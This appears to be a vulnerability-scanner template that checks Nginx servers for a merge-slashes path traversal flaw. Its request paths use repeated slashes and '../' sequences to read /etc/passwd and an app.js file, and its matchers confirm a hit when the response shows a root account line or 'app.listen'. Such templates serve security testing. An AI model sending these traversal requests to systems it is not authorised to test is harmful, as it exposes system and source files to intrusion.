id: nginx-merge-slashes-path-traversal info: name: Nginx Server - Local File Inclusion author: dhiyaneshDk severity: medium description: Nginx server is vulnerable to local file inclusion. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json - https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 tags: exposure,config,lfi,nginx requests: - method: GET path: - "{{BaseURL}}///////../../../etc/passwd" - "{{BaseURL}}/static///////../../../../etc/passwd" - "{{BaseURL}}///../app.js" stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - "app.listen" part: body condition: or - type: status status: - 200 # Enhanced by mp on 2022/07/27